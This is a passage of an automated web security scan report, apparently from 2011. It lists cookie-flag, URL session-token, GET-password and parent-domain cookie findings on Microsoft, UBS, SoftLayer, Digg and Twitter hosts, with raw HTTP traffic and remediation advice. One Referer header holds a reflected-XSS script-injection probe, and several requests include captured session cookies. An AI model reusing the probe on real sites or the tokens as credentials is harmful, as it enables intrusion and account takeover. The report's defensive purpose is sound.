Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-3ccd6cb3-2eff-4d36-a83a-da7d7f8300dc; path=/;version=1
Set-Cookie: MSPBack=1309951135; domain=login.live.com;path=/;version=1
PPServer: PPV: 30 H: BAYIDSLGN1O48 V: 0
Date: Wed, 06 Jul 2011 14:08:45 GMT
Connection: close

<html><head><noscript>JavaScript required to sign in<meta http-equiv="Refresh" content="0; URL=https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033"/></noscript><title>Continue</title><script type=
...[SNIP]...

6.11. https://msnia.login.live.com/ppsecure/post.srf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://msnia.login.live.com
Path:   /ppsecure/post.srf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ppsecure/post.srf HTTP/1.1
Host: msnia.login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 12632
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:33 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-3040ca2c-de70-4a63-9d3d-1c68eed3a3d2; domain=login.live.com;path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: TK2IDSMLGN1A10 V: 0
Date: Wed, 06 Jul 2011 11:21:32 GMT
Connection: close

<!-- ServerInfo: TK2IDSMLGN1A10 2011.06.02.00.31.45 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA130, -- Version: 11,0,18178,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountr
...[SNIP]...

6.12. https://quotes-public.ubs.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://quotes-public.ubs.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: quotes-public.ubs.com
Connection: keep-alive
Referer: https://www2.ubs.com/1/ssl/e/contact/contact.html?NavLB_Www=1309960260
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309981931097:ss=1309981804815

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 13:53:56 GMT
Server: Apache
Pragma: no-cache
Set-Cookie: NavLB_PQ=quotes-public1.ubs.com; Domain=.ubs.com; Path=/; Version=1
Connection: close
Location: https://quotes-public1.ubs.com:443/?NavLB_PQ=1309960436
Cache-Control: no-cache
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 288
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A
...[SNIP]...

7. Session token in URL  previous  next
There are 3 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


7.1. https://manage.softlayer.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://manage.softlayer.com
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: manage.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:20:43 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 18394

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" version="XHTML+RDFa 1.0" xml:lang="en-us">
<head>
...[SNIP]...
<li><a id="_lpChatBtn1" target="chat12703439" href="https://sales.liveperson.net/hc/12703439/?cmd=file&amp;file=visitorWantsToChat&amp;site=12703439&amp;byhref=1&amp;SESSIONVAR%21skill=Sales-SL-Portal-English&amp;imageUrl=https%3A%2F%2Fwww.softlayer.com%2Fimg" onClick="javascript:window.open('https://sales.liveperson.net/hc/12703439/?cmd=file&amp;file=visitorWantsToChat&amp;site=12703439&amp;SESSIONVAR%21skill=Sales-SL-Portal-English&amp;imageUrl=https%3A%2F%2Fwww.softlayer.com%2Fimg&amp;referrer='+escape(document.location),'chat12703439','width=500,height=500,resizable=yes');return false;" class="red linkN">sales chat</a>
...[SNIP]...

7.2. https://manage.softlayer.com/Sales/orderComputingInstance  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://manage.softlayer.com
Path:   /Sales/orderComputingInstance

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /Sales/orderComputingInstance HTTP/1.1
Host: manage.softlayer.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1306442258.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __qca=P0-1683070318-1308913155755; _mkto_trk=id:220-ESA-932&token:_mch-softlayer.com-1306437485169-98953; __utma=1.1168266774.1306437626.1306442258.1308913135.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:14:55 GMT
Server: Apache
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 18438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" version="XHTML+RDFa 1.0" xml:lang="en-us">
<head>
...[SNIP]...
<li><a id="_lpChatBtn1" target="chat12703439" href="https://sales.liveperson.net/hc/12703439/?cmd=file&amp;file=visitorWantsToChat&amp;site=12703439&amp;byhref=1&amp;SESSIONVAR%21skill=Sales-SL-Portal-English&amp;imageUrl=https%3A%2F%2Fwww.softlayer.com%2Fimg" onClick="javascript:window.open('https://sales.liveperson.net/hc/12703439/?cmd=file&amp;file=visitorWantsToChat&amp;site=12703439&amp;SESSIONVAR%21skill=Sales-SL-Portal-English&amp;imageUrl=https%3A%2F%2Fwww.softlayer.com%2Fimg&amp;referrer='+escape(document.location),'chat12703439','width=500,height=500,resizable=yes');return false;" class="red linkN">sales chat</a>
...[SNIP]...

7.3. https://manage.softlayer.com/index/index  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://manage.softlayer.com
Path:   /index/index

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /index/index HTTP/1.1
Host: manage.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:20:45 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 18404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" version="XHTML+RDFa 1.0" xml:lang="en-us">
<head>
...[SNIP]...
<li><a id="_lpChatBtn1" target="chat12703439" href="https://sales.liveperson.net/hc/12703439/?cmd=file&amp;file=visitorWantsToChat&amp;site=12703439&amp;byhref=1&amp;SESSIONVAR%21skill=Sales-SL-Portal-English&amp;imageUrl=https%3A%2F%2Fwww.softlayer.com%2Fimg" onClick="javascript:window.open('https://sales.liveperson.net/hc/12703439/?cmd=file&amp;file=visitorWantsToChat&amp;site=12703439&amp;SESSIONVAR%21skill=Sales-SL-Portal-English&amp;imageUrl=https%3A%2F%2Fwww.softlayer.com%2Fimg&amp;referrer='+escape(document.location),'chat12703439','width=500,height=500,resizable=yes');return false;" class="red linkN">sales chat</a>
...[SNIP]...

8. Password field submitted using GET method  previous  next
There are 7 instances of this issue:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.


8.1. http://digg.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET / HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: imp_id=be4697b47d58b1200ef3f6956c8cc49e2813419339d6fd7bb526092b66b1dc13; expires=Thu, 07-Jul-2011 11:37:07 GMT; path=/; domain=digg.com
X-Digg-Time: D=237528 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 101255

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- All Topics
- The Latest News Headlines, Videos and Images
</title>

<met
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

8.2. http://digg.com/login  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /login

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /login HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=24276 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8609

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology, headlin
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

8.3. http://digg.com/register  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /register

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /register HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=38879 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10144

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology, headlin
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

8.4. http://digg.com/search  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /search

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /search HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=27180 10.2.129.226
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8308

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Search
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, pol
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

8.5. http://digg.com/submit  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /submit?phase=2&url=https://www.microsoft.com/presspass/presskits/DCU/default.aspx HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:16:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=24761 10.2.128.235
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 8620

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

8.6. http://digg.com/topic  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /topic

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /topic HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=31422 10.2.129.226
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12469

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology, headlin
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

8.7. http://digg.com/upcoming  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /upcoming

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /upcoming HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: imp_id=d49aeb50a0490b4b7e1f800682c23d942b50abde233eda6a7b26c684f1cf95d6; expires=Thu, 07-Jul-2011 11:37:07 GMT; path=/; domain=digg.com
X-Digg-Time: D=300792 10.2.129.80
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 98962

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- All Topics
- Upcoming News Headlines, Videos and Images
</title>

<meta
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

9. Cookie scoped to parent domain  previous  next
There are 44 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


9.1. https://accountservices.passport.net/gethip.srf  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://accountservices.passport.net
Path:   /gethip.srf

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gethip.srf?lc=1033&fid=2044200945&id=75046&fre=hard&type=visual HTTP/1.1
Host: accountservices.passport.net
Connection: keep-alive
Referer: https://accountservices.passport.net/uiresetpw.srf?mkt=EN-US&lc=1033&id=75046
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CkTst=G1309951137024

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 19932
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:14 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
Set-Cookie: HIPSession=45S*6vuIWEDZGNM0*09htdJwOMobm7R5E2ZMW2RB2dSGkqC*apBp98w1vt43A3esAug*iHMBVLNvVAtuPikOTavfE!XPLQvoM*ecgi7xDXNJg$; domain=.passport.net;path=/;version=1
PPServer: PPV: 30 H: BAYIDSPROF1D05 V: 0
Date: Wed, 06 Jul 2011 11:21:13 GMT
Connection: close

var HIPM={name:"HIPM",innerFrame:null,comeinURLr:"",comeinURL:"",vv:"",eEmpty:"",eTooLong:"",eWrongAnswer:"",solutionElemt:"",afr:"audio",vfr:"visual",instruction:"",starttime:null,endtime:null,solnti
...[SNIP]...

9.2. http://api.twitter.com/1/statuses/user_timeline.json  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline.json?since_id=68453667229020161&include_entities=1&include_available_features=1&contributor_details=true&include_rts=true&user_id=15163484 HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
X-Twitter-Polling: true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*; q=0.01
X-Phx: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1309445969207029; __utma=43838368.1598605414.1305368954.1308923300.1309960866.11; __utmb=43838368.1.10.1309960866; __utmc=43838368; __utmz=43838368.1309960866.11.4.utmcsr=techflash.com|utmccn=(referral)|utmcmd=referral|utmcct=/about.html; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; guest_id=v1%3A130884465537011414; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCAzhKP8wAToOcmV0dXJuX3RvIiBodHRwOi8v%250AdHdpdHRlci5jb20vZ3JlZ2xhbW06B2lkIiVkNDQ5NTQwNjk5YTQ4ZDU0NjNl%250AZjhmNDNiYWM3MjQyNToMY3NyZl9pZCIlM2UwN2EzMmM4Zjk4ZGJjYjE0ZTM0%250AYTQ1YzQzMmQzYTUiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNo%250AOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%253D--f3d4f811a37ea07fd8b37060d2e6643dd71eac68

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:04:12 GMT
Server: hi
Status: 200 OK
X-Transaction: 1309961052-4529-6887
X-RateLimit-Limit: 1000
ETag: "9c237181185d2b078bf4fda3390239f0"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 06 Jul 2011 14:04:12 GMT
X-RateLimit-Remaining: 994
X-Runtime: 0.01930
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114aff9ed0a
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 239a05ec8562be929883e9ec9c5449f8d4242a71
X-RateLimit-Reset: 1309964469
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCAzhKP8wAToOcmV0dXJuX3RvIiBodHRwOi8v%250AdHdpdHRlci5jb20vZ3JlZ2xhbW06DGNzcmZfaWQiJTNlMDdhMzJjOGY5OGRi%250AY2IxNGUzNGE0NWM0MzJkM2E1OgdpZCIlZDQ0OTU0MDY5OWE0OGQ1NDYzZWY4%250AZjQzYmFjNzI0MjUiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNo%250AOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%253D--25bb772d1d71a9f9c11b1038f0fad6e3f4958060; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 4534
Connection: close

{"statuses":[],"packed_response_type":"statuses","available_features":{"tweet_stream_retweets_by_others":1,"dashboard_activity_listed":1,"phoenix_tweetbox_talon":1,"tweet_stream_favorites_polling":1,"
...[SNIP]...

9.3. http://c.microsoft.com/trans_pixel.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://c.microsoft.com
Path:   /trans_pixel.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trans_pixel.aspx?tz=-5&ti=Microsoft%20Search%20Preferences%20Page&fi=1&fv=10.3&r=http%3A%2F%2Fburp%2Fshow%2F0&ts=1309951354314&sr=1920x1200&bs=1041x985 HTTP/1.1
Host: c.microsoft.com
Proxy-Connection: keep-alive
Referer: http://search.microsoft.com/Preference.aspx?bd498%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Ef1d3c6b4585=1&mkt=en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; mcI=Thu, 09 Jun 2011 16:24:17 GMT; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; msdn=L=1033; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; s_vnum=1311213700142%26vn%3D2; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=06/21/2011 12:35:21&Microsoft.VisitStartDate=06/21/2011 12:32:03&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=29&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1309940116672:ss=1309940093261

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Server: Microsoft-IIS/7.5
Set-Cookie: MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=c7fac793-ceeb-435f-829d-6351edfd89a3&Microsoft.CreationDate=07/06/2011 11:22:37&Microsoft.LastVisitDate=07/06/2011 11:22:38&Microsoft.NumberOfVisits=2&SessionCookie.Id=26FDF2F789E3D4343E8A3F6065EE6BF1; domain=microsoft.com; expires=Wed, 06-Jul-2011 11:52:38 GMT; path=/
Set-Cookie: MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/06/2011 11:22:38&Microsoft.VisitStartDate=07/06/2011 11:22:37&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=31&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; domain=microsoft.com; expires=Thu, 05-Jul-2012 11:22:38 GMT; path=/
Set-Cookie: MS0=3382a99b723844019751e1a79738c963; domain=.microsoft.com; expires=Wed, 06-Jul-2011 11:52:38 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 11:22:38 GMT
Content-Length: 44

GIF89a........3....!.......,........@...Q.;.

9.4. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

